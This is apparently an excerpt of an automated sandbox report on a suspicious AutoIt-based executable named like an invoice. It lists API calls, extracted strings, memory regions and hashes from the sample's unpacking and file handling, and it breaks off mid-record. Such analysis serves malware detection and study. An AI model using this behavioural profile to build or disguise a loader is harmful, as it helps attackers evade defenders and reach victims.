                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                          • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                          • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                          • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                          • timeGetTime.WINMM ref: 00410D16
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                          • Sleep.KERNEL32(0000000A), ref: 00410E61
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                          • DestroyWindow.USER32 ref: 00410F06
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                          • TranslateMessage.USER32(?), ref: 00445C60
                                          • DispatchMessageW.USER32(?), ref: 00445C6E
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                          • API String ID: 4212290369-1082885916
                                          • Opcode ID: 8c862c1adef0dd174fd2be55be65c9d74d6103239cf7f684fe8d594734bcf318
                                          • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                          • Opcode Fuzzy Hash: 8c862c1adef0dd174fd2be55be65c9d74d6103239cf7f684fe8d594734bcf318
                                          • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorFreeLast
                                          • String ID:
                                          • API String ID: 1762890227-0
                                          • Opcode ID: 107337f4b2561ade14b97fb3fdb6340e6d6d936569fc35746c87d3143ac3ad3e
                                          • Instruction ID: eafe17e6b45ba203a3060a4539131b6c5afb0e2f6a7e900b78ad195398c31245
                                          • Opcode Fuzzy Hash: 107337f4b2561ade14b97fb3fdb6340e6d6d936569fc35746c87d3143ac3ad3e
                                          • Instruction Fuzzy Hash: A9F1377194C3809ECF3657284C48B363AE4EB77770F5C06EAE491D6CF2EE658D089266

                                          Control-flow Graph
                                          APIs
                                            • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                            • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                          • __wsplitpath.LIBCMT ref: 00469234
                                            • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                          • _wcscpy.LIBCMT ref: 00469247
                                          • _wcscat.LIBCMT ref: 0046925A
                                          • __wsplitpath.LIBCMT ref: 0046927F
                                          • _wcscat.LIBCMT ref: 00469295
                                          • _wcscat.LIBCMT ref: 004692A8
                                            • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                            • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                          • _wcscmp.LIBCMT ref: 004691EF
                                            • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                            • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                          • _wcsncpy.LIBCMT ref: 004694C5
                                          • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: dafe4648b5bbac87b0fd5884d323520927b6c8dc5856a1245f48faeb858b36b7
                                          • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                          • Opcode Fuzzy Hash: dafe4648b5bbac87b0fd5884d323520927b6c8dc5856a1245f48faeb858b36b7
                                          • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                          • RegisterClassExW.USER32(00000030), ref: 0040309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                          • LoadIconW.USER32(000000A9), ref: 004030F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                          • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                          • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                          • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                          • RegisterClassExW.USER32(00000030), ref: 0040309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                          • LoadIconW.USER32(000000A9), ref: 004030F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                          • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                          • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                          • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                                          Control-flow Graph
                                          APIs
                                            • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                            • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                          • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                          • _wcscat.LIBCMT ref: 0043E9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: a6d0115487cac6cdb78e914e361494f58dec76b172a5a3d65aa719fa9822dcc2
                                          • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                          • Opcode Fuzzy Hash: a6d0115487cac6cdb78e914e361494f58dec76b172a5a3d65aa719fa9822dcc2
                                          • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

                                          Control-flow Graph
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                          • KillTimer.USER32(?,00000001), ref: 004036FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                          • CreatePopupMenu.USER32 ref: 0040373E
                                          • PostQuitMessage.USER32(00000000), ref: 0040374D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated$%I
                                          • API String ID: 129472671-1195164674
                                          • Opcode ID: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
                                          • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                          • Opcode Fuzzy Hash: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
                                          • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                          • LoadIconW.USER32(00000063), ref: 00403A76
                                          • LoadIconW.USER32(000000A4), ref: 00403A88
                                          • LoadIconW.USER32(000000A2), ref: 00403A9A
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                          • RegisterClassExW.USER32(?), ref: 00403B16
                                            • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                            • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                            • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                            • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                            • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                            • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                            • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                          • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                          • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                          • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06bc54eb2d9f9ee961d034c76a270615f835743abaeff911c3c0ae3b53704266
                                          • Instruction ID: d829bda29f59ac4724cfd878eb953ba4df45887dbe710049cc6e0dea31cab199
                                          • Opcode Fuzzy Hash: 06bc54eb2d9f9ee961d034c76a270615f835743abaeff911c3c0ae3b53704266
                                          • Instruction Fuzzy Hash: 55A27B7190D3808FC735EB18C8447AABBE1EFD5318F09499AE598972B2D735AC04CB97

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                          • API String ID: 1825951767-3937808951
                                          • Opcode ID: bf729bc036ab1e3317ed16226f5a6ba2ab3dbb3ff9daeb18d2562a5e898344aa
                                          • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                          • Opcode Fuzzy Hash: bf729bc036ab1e3317ed16226f5a6ba2ab3dbb3ff9daeb18d2562a5e898344aa
                                          • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                                          Control-flow Graph
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E9E331
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E9E557
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID: K
                                          • API String ID: 204039940-902739187
                                          • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                          • Instruction ID: e60c2acefbbd72290ea6a677c502850d34282a2c3322eb8c9ff491b949e3f97b
                                          • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                          • Instruction Fuzzy Hash: 33A10470E00209EBDF14CFA4C894BEEBBB5BF48304F209559E611BB381D7759A81CBA5

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                            • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                          • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                          • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID: <WL$\TL$%I$SL
                                          • API String ID: 1986988660-4199584472
                                          • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                          • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                          • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                          • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                                          Control-flow Graph

                                          • Single basic block 4039d5-403a45 (graph rendering not reproduced): CreateWindowExW (x2), ShowWindow (x2)
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                          • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                          • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                          • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                          • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                          • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                                          Control-flow Graph

                                          • Function e9dff0-e9e215 (graph rendering not reproduced): CreateFileW, VirtualAlloc, ReadFile, ExitProcess; internal calls to e9bc40, e9dee0, e9df20, e9cee0, e9df70
                                          APIs
                                            • Part of subcall function 00E9DEE0: Sleep.KERNEL32(000001F4), ref: 00E9DEF1
                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E9E14F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: PD9XR0W7FH8XIDKNWOLAUVV54X4
                                          • API String ID: 2694422964-3516752874
                                          • Opcode ID: 5773e1090c5f8a66ca788a68a1dfa00b88f3a40417d6852568d53515f677784c
                                          • Instruction ID: fcf7d4a4dfc5894e1d41c0ba975dc80b9820846ec63421b367666a2b8e327a8c
                                          • Opcode Fuzzy Hash: 5773e1090c5f8a66ca788a68a1dfa00b88f3a40417d6852568d53515f677784c
                                          • Instruction Fuzzy Hash: 1A617430D08288DAEF11DBB4C844BEFBBB9AF15304F044599E2497B2C1D7BA1B45CB65

                                          Control-flow Graph

                                          • Function 40407c-40417d with out-of-line blocks 43d3c8-43d41e (graph rendering not reproduced): LoadStringW, Shell_NotifyIconW; internal calls to 407a16, 407bcc, 407b2e, 406fe3, 422de0, 40454e, 422dbc, 405904, 407cab, 408047
                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • _memset.LIBCMT ref: 004040FC
                                          • _wcscpy.LIBCMT ref: 00404150
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                          Strings
                                          Memory Dump Source
